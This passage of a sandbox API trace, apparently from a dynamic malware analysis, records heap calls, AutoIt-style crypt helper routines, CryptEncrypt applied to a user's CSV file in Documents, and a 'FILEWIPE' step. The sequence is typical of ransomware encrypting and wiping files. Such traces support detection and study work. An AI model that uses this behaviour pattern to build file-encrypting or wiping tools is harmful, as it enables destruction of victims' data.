returned 1 [0036.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0036.406] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0036.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.406] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.406] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0036.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.409] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.409] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.409] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.410] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.410] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.410] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.410] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.410] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.410] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.410] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.410] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0036.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.410] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.410] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.410] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.410] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.410] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.410] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.410] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.410] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0036.410] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.411] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.411] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.411] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.411] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.411] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.411] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1c01, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x1c10) returned 1 [0036.411] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.411] CharLowerBuffW (in: lpsz="byte[7185]", cchLength=0xa | out: lpsz="byte[7185]") returned 0xa [0036.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.411] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95a448*, pdwDataLen=0x6ae220*=0x1c01, dwBufLen=0x1c10 | out: pbData=0x95a448*, pdwDataLen=0x6ae220*=0x1c10) returned 1 [0036.412] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0036.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.415] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0036.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.415] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.415] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.415] CryptDestroyKey (hKey=0x7c2280) returned 1 [0036.415] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0036.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.416] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0036.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.417] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0036.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.417] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0036.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.417] FreeLibrary (hLibModule=0x754b0000) returned 1 [0036.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0036.419] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0036.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0036.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.419] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447c1820, ftCreationTime.dwHighDateTime=0x1d5bfca, ftLastAccessTime.dwLowDateTime=0x8ed2db60, ftLastAccessTime.dwHighDateTime=0x1d5c19c, ftLastWriteTime.dwLowDateTime=0x8ed2db60, ftLastWriteTime.dwHighDateTime=0x1d5c19c, nFileSizeHigh=0x0, nFileSizeLow=0x1c01, dwReserved0=0x0, dwReserved1=0x777648, cFileName="PM4N5-.csv", cAlternateFileName="")) returned 0x7c2100 [0036.419] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 